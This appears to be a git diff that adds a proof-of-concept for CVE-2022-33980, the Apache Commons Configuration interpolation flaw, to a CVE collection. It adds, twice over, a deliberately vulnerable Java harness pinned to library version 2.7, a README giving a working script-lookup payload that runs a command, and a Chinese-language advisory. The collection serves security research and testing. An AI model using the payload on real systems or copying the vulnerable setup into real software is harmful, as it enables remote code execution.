diff --git a/cve/2022/CVE-2022-33980/CVE_2022_33980.java b/cve/2022/CVE-2022-33980/CVE_2022_33980.java
new file mode 100755
index 0000000000000000000000000000000000000000..d1ea060a3d52e5969f62ff0f87569493b6c40d12
--- /dev/null
+++ b/cve/2022/CVE-2022-33980/CVE_2022_33980.java
@@ -0,0 +1,23 @@
+import org.apache.commons.configuration2.interpol.ConfigurationInterpolator;
+import org.apache.commons.configuration2.interpol.InterpolatorSpecification;
+
+public class CVE_2022_33980 {
+    private static String onInput(String input) {
+        InterpolatorSpecification spec = new InterpolatorSpecification.Builder()
+                .withPrefixLookups(ConfigurationInterpolator.getDefaultPrefixLookups())
+                .withDefaultLookups(ConfigurationInterpolator.getDefaultPrefixLookups().values())
+                .create();
+
+        ConfigurationInterpolator interpolator = ConfigurationInterpolator.fromSpecification(spec);
+        return interpolator.interpolate(input).toString();
+    }
+
+    public static void main(String[] args) {
+        while (true) {
+            System.out.print("Input: ");
+            String input = System.console().readLine();
+            String output = onInput(input);
+            System.out.println("Output: " + output);
+        }
+    }
+}
diff --git a/cve/2022/CVE-2022-33980/README.md b/cve/2022/CVE-2022-33980/README.md
new file mode 100755
index 0000000000000000000000000000000000000000..157d5992090b257447429a13b319f8a3de28fece
--- /dev/null
+++ b/cve/2022/CVE-2022-33980/README.md
@@ -0,0 +1,3 @@
+# CVE-2022-33980
+
+`${script:js:java.lang.Runtime.getRuntime().exec("calc")}`  
diff --git a/cve/2022/CVE-2022-33980/pom.xml b/cve/2022/CVE-2022-33980/pom.xml
new file mode 100755
index 0000000000000000000000000000000000000000..e988f2b067d95c097f1d42257183d884fb285e53
--- /dev/null
+++ b/cve/2022/CVE-2022-33980/pom.xml
@@ -0,0 +1,102 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+  <modelVersion>4.0.0</modelVersion>
+
+  <!-- Project artifact -->
+  <groupId>com.sammwy</groupId>
+  <artifactId>poc_cve_2022_33980</artifactId>
+  <version>0.0.1</version>
+
+  <!-- Project information -->
+  <name>poc_cve_2022_33980</name>
+  <description>This is just a boilerplate project.</description>
+  <url>http://www.example.com</url>
+
+  <!-- Project build properties -->
+  <properties>
+    <mainClass>CVE_2022_33980</mainClass>
+    <javaVersion>1.8</javaVersion>
+    <!-- Don't modify this -->
+    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+  </properties>
+
+  <!-- Dependencies imports -->
+  <dependencies>
+    <dependency>
+      <groupId>junit</groupId>
+      <artifactId>junit</artifactId>
+      <version>4.11</version>
+      <scope>test</scope>
+    </dependency>
+    <!-- https://mvnrepository.com/artifact/org.apache.commons/commons-configuration2 -->
+    <dependency>
+      <groupId>org.apache.commons</groupId>
+      <artifactId>commons-configuration2</artifactId>
+      <version>2.7</version>
+    </dependency>
+  </dependencies>
+
+  <!-- Build settings -->
+  <build>
+    <!-- Name of your compiled artifact -->
+    <finalName>${artifactId}</finalName>
+    <!-- Clean old builds and install dependencies before compile -->
+    <defaultGoal>clean install</defaultGoal>
+    <!-- Package files inside resource directory in to the jar -->
+    <resources>
+      <resource>
+        <directory>src/main/resources</directory>
+        <filtering>true</filtering> <!-- Filter variables -->
+      </resource>
+    </resources>
+    <!-- Compilation settings starts here -->
+    <plugins>
+      <plugin>
+        <artifactId>maven-clean-plugin</artifactId>
+        <version>3.1.0</version>
+      </plugin>
+      <plugin>
+        <artifactId>maven-resources-plugin</artifactId>
+        <version>3.0.2</version>
+      </plugin>
+      <!-- Compile with specified java version -->
+      <plugin>
+        <artifactId>maven-compiler-plugin</artifactId>
+        <version>3.8.1</version>
+        <configuration>
+          <source>${javaVersion}</source>
+          <target>${javaVersion}</target>
+        </configuration>
+      </plugin>
+      <plugin>
+        <artifactId>maven-surefire-plugin</artifactId>
+        <version>2.22.1</version>
+      </plugin>
+      <plugin>
+        <artifactId>maven-install-plugin</artifactId>
+        <version>2.5.2</version>
+      </plugin>
+      <plugin>
+        <groupId>org.apache.maven.plugins</groupId>
+        <artifactId>maven-assembly-plugin</artifactId>
+        <executions>
+          <execution>
+            <phase>package</phase>
+            <goals>
+              <goal>single</goal>
+            </goals>
+            <configuration>
+              <archive>
+                <manifest>
+                  <mainClass>${mainClass}</mainClass>
+                </manifest>
+              </archive>
+              <descriptorRefs>
+                <descriptorRef>jar-with-dependencies</descriptorRef>
+              </descriptorRefs>
+            </configuration>
+          </execution>
+        </executions>
+      </plugin>
+    </plugins>
+  </build>
+</project>
\ No newline at end of file
diff --git a/cve/2022/yaml/CVE-2022-33980.yaml b/cve/2022/yaml/CVE-2022-33980.yaml
new file mode 100755
index 0000000000000000000000000000000000000000..5dadfe3c7d57bbb27d724daf62bbf5b5ce1e4c2e
--- /dev/null
+++ b/cve/2022/yaml/CVE-2022-33980.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-33980
+source: https://github.com/sammwyy/CVE-2022-33980-POC
+info:
+  name: Apache Commons Configuration执行变量插值，允许动态评估和扩展属性。插值的标准格式是"${prefix:name}"，其中"prefix"用来定位执行插值的org.apache.commons.configuration2.interpol.Lookup的实例。。
+  severity: CRITICAL
+  description:
+    从版本2.4开始，一直到2.7，默认查找实例集包括可以导致任意代码执行或与远程服务器联系的插值器。这些查找是:—“script”—使用JVM脚本执行引擎(javax.script)执行表达式—“dns”—解析dns记录—“url”—从url加载值，包括从远程服务器加载值，在受影响的版本中使用插值默认值的应用程序可能容易受到远程代码执行的影响，如果使用了不受信任的配置值，可能会无意地与远程服务器接触。该版本默认禁用有问题的插补器。
+  scope-of-influence:
+    2.4 <= Apache Commons Text <= 2.7
+  reference:
+    - https://blog.csdn.net/Xxy605/article/details/126114740
+    - https://blog.csdn.net/kjcxmx/article/details/126276689
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: CVE-2022-33980
+    cwe-id: None
+    cnvd-id: None
+    kve-id: None
+  tags: CVE-2022, apache Commons Configuration
diff --git a/cve/apache-CC/2022/CVE-2022-33980/CVE_2022_33980.java b/cve/apache-CC/2022/CVE-2022-33980/CVE_2022_33980.java
new file mode 100755
index 0000000000000000000000000000000000000000..d1ea060a3d52e5969f62ff0f87569493b6c40d12
--- /dev/null
+++ b/cve/apache-CC/2022/CVE-2022-33980/CVE_2022_33980.java
@@ -0,0 +1,23 @@
+import org.apache.commons.configuration2.interpol.ConfigurationInterpolator;
+import org.apache.commons.configuration2.interpol.InterpolatorSpecification;
+
+public class CVE_2022_33980 {
+    private static String onInput(String input) {
+        InterpolatorSpecification spec = new InterpolatorSpecification.Builder()
+                .withPrefixLookups(ConfigurationInterpolator.getDefaultPrefixLookups())
+                .withDefaultLookups(ConfigurationInterpolator.getDefaultPrefixLookups().values())
+                .create();
+
+        ConfigurationInterpolator interpolator = ConfigurationInterpolator.fromSpecification(spec);
+        return interpolator.interpolate(input).toString();
+    }
+
+    public static void main(String[] args) {
+        while (true) {
+            System.out.print("Input: ");
+            String input = System.console().readLine();
+            String output = onInput(input);
+            System.out.println("Output: " + output);
+        }
+    }
+}
diff --git a/cve/apache-CC/2022/CVE-2022-33980/README.md b/cve/apache-CC/2022/CVE-2022-33980/README.md
new file mode 100755
index 0000000000000000000000000000000000000000..157d5992090b257447429a13b319f8a3de28fece
--- /dev/null
+++ b/cve/apache-CC/2022/CVE-2022-33980/README.md
@@ -0,0 +1,3 @@
+# CVE-2022-33980
+
+`${script:js:java.lang.Runtime.getRuntime().exec("calc")}`  
diff --git a/cve/apache-CC/2022/CVE-2022-33980/pom.xml b/cve/apache-CC/2022/CVE-2022-33980/pom.xml
new file mode 100755
index 0000000000000000000000000000000000000000..e988f2b067d95c097f1d42257183d884fb285e53
--- /dev/null
+++ b/cve/apache-CC/2022/CVE-2022-33980/pom.xml
@@ -0,0 +1,102 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+  <modelVersion>4.0.0</modelVersion>
+
+  <!-- Project artifact -->
+  <groupId>com.sammwy</groupId>
+  <artifactId>poc_cve_2022_33980</artifactId>
+  <version>0.0.1</version>
+
+  <!-- Project information -->
+  <name>poc_cve_2022_33980</name>
+  <description>This is just a boilerplate project.</description>
+  <url>http://www.example.com</url>
+
+  <!-- Project build properties -->
+  <properties>
+    <mainClass>CVE_2022_33980</mainClass>
+    <javaVersion>1.8</javaVersion>
+    <!-- Don't modify this -->
+    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+  </properties>
+
+  <!-- Dependencies imports -->
+  <dependencies>
+    <dependency>
+      <groupId>junit</groupId>
+      <artifactId>junit</artifactId>
+      <version>4.11</version>
+      <scope>test</scope>
+    </dependency>
+    <!-- https://mvnrepository.com/artifact/org.apache.commons/commons-configuration2 -->
+    <dependency>
+      <groupId>org.apache.commons</groupId>
+      <artifactId>commons-configuration2</artifactId>
+      <version>2.7</version>
+    </dependency>
+  </dependencies>
+
+  <!-- Build settings -->
+  <build>
+    <!-- Name of your compiled artifact -->
+    <finalName>${artifactId}</finalName>
+    <!-- Clean old builds and install dependencies before compile -->
+    <defaultGoal>clean install</defaultGoal>
+    <!-- Package files inside resource directory in to the jar -->
+    <resources>
+      <resource>
+        <directory>src/main/resources</directory>
+        <filtering>true</filtering> <!-- Filter variables -->
+      </resource>
+    </resources>
+    <!-- Compilation settings starts here -->
+    <plugins>
+      <plugin>
+        <artifactId>maven-clean-plugin</artifactId>
+        <version>3.1.0</version>
+      </plugin>
+      <plugin>
+        <artifactId>maven-resources-plugin</artifactId>
+        <version>3.0.2</version>
+      </plugin>
+      <!-- Compile with specified java version -->
+      <plugin>
+        <artifactId>maven-compiler-plugin</artifactId>
+        <version>3.8.1</version>
+        <configuration>
+          <source>${javaVersion}</source>
+          <target>${javaVersion}</target>
+        </configuration>
+      </plugin>
+      <plugin>
+        <artifactId>maven-surefire-plugin</artifactId>
+        <version>2.22.1</version>
+      </plugin>
+      <plugin>
+        <artifactId>maven-install-plugin</artifactId>
+        <version>2.5.2</version>
+      </plugin>
+      <plugin>
+        <groupId>org.apache.maven.plugins</groupId>
+        <artifactId>maven-assembly-plugin</artifactId>
+        <executions>
+          <execution>
+            <phase>package</phase>
+            <goals>
+              <goal>single</goal>
+            </goals>
+            <configuration>
+              <archive>
+                <manifest>
+                  <mainClass>${mainClass}</mainClass>
+                </manifest>
+              </archive>
+              <descriptorRefs>
+                <descriptorRef>jar-with-dependencies</descriptorRef>
+              </descriptorRefs>
+            </configuration>
+          </execution>
+        </executions>
+      </plugin>
+    </plugins>
+  </build>
+</project>
\ No newline at end of file
diff --git a/cve/apache-CC/2022/yaml/CVE-2022-33980.yaml b/cve/apache-CC/2022/yaml/CVE-2022-33980.yaml
new file mode 100755
index 0000000000000000000000000000000000000000..6e237193d56aabb83d2a79e9546cda03a9ad388f
--- /dev/null
+++ b/cve/apache-CC/2022/yaml/CVE-2022-33980.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-33980
+source: https://github.com/sammwyy/CVE-2022-33980-POC
+info:
+  name: Apache Commons Configuration执行变量插值，允许动态评估和扩展属性。插值的标准格式是"${prefix:name}"，其中"prefix"用来定位执行插值的org.apache.commons.configuration2.interpol.Lookup的实例。。
+  severity: CRITICAL
+  description:
+    从版本2.4开始，一直到2.7，默认查找实例集包括可以导致任意代码执行或与远程服务器联系的插值器。这些查找是:—“script”—使用JVM脚本执行引擎(javax.script)执行表达式—“dns”—解析dns记录—“url”—从url加载值，包括从远程服务器加载值，在受影响的版本中使用插值默认值的应用程序可能容易受到远程代码执行的影响，如果使用了不受信任的配置值，可能会无意地与远程服务器接触。该版本默认禁用有问题的插补器。
+  scope-of-influence:
+    2.4 <= Apache Commons Text <= 2.7
+  reference:
+    - https://blog.csdn.net/Xxy605/article/details/126114740
+    - https://blog.csdn.net/kjcxmx/article/details/126276689
+  classification:
+    cvss-metrics:  
+    cvss-score: 
+    cve-id: CVE-2022-33980
+    cwe-id: None
+    cnvd-id: None
+    kve-id: None
+  tags: CVE-2022, apache Commons Configuration
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index a39bab918729fb12510cb76508e82d8d225740c6..0eaa3e43949d92d687d5b7ef35928f43d896b9fc 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -20,6 +20,8 @@ cve:
     - CVE-2023-25194
   apache-OFBiz:
     - CVE-2021-26295
+  apache-CC:
+    - CVE-2022-33980
   apache-Airflow:
     - CVE-2020-11978
   apache-log4j: